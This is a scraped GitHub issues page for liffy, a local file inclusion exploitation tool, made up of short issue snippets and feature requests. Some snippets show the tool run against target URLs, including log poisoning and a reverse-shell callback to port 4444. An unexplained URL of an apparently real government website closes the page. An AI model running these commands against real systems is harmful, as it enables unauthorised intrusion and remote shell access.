liffy icon indicating copy to clipboard operation
liffy copied to clipboard

Local file inclusion exploitation tool

Results 7 liffy issues
Sort by recently updated
recently updated
newest added

``` (liffy) [user@host ~/liffy ]$ python liffy.py "http://xxxxx:49768/?file=" -a -l /var/apache2/access.log _ _ __ __ ___ ___ | | (_)/ _|/ _| |__ \ / _ \ | | _|...

- Make the code more clear, remove useless variables. - Show the help message if the user does not provide any arguments. ![image](https://user-images.githubusercontent.com/48088579/132890534-d8fc0e34-0d0c-4415-ae02-a0fdc8bcd6a8.png)

I'm execute this command python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i Liffy v2.0 [~] Checking Target: 206.209.126.5 [~] Testing with data:// [?] Host For Callbacks: 192.168.1.54 [?] Port For Callbacks: 4444...

http://www.codercaste.com/2009/10/03/the-null-byte-poisoning-attack-explained/ https://web.archive.org/web/20170617080614/hakipedia.com/index.php/Poison_Null_Byte Showcased on OWASP Juice shop: https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.html#access-a-developers-forgotten-backup-file

It would be nice if we can perform LFI testing without having to give a shell back. Just to shell if any parameter is vulnerable or not

There should be an option to test for directory traversal while taking payload from a file.

enhancement
help wanted

https://www.el-mouradia.dz/ar/president?page=1